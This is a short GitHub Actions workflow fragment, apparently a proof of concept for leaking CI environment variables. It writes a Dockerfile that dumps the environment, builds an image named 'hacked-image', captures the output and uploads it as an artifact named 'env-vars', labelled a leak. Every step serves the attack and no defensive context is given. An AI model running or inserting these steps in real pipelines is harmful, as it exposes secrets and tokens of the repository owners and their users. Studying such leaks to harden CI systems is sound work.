- name: Write Dockerfile
  run: echo -e "FROM alpine\nRUN env > /env_dump && cat /env_dump" > Dockerfile

- name: Build image and capture output
  run: docker build -t hacked-image . | tee output.txt

- name: Upload leak as artifact
  uses: actions/upload-artifact@v3
  with:
    name: env-vars
    path: output.txt
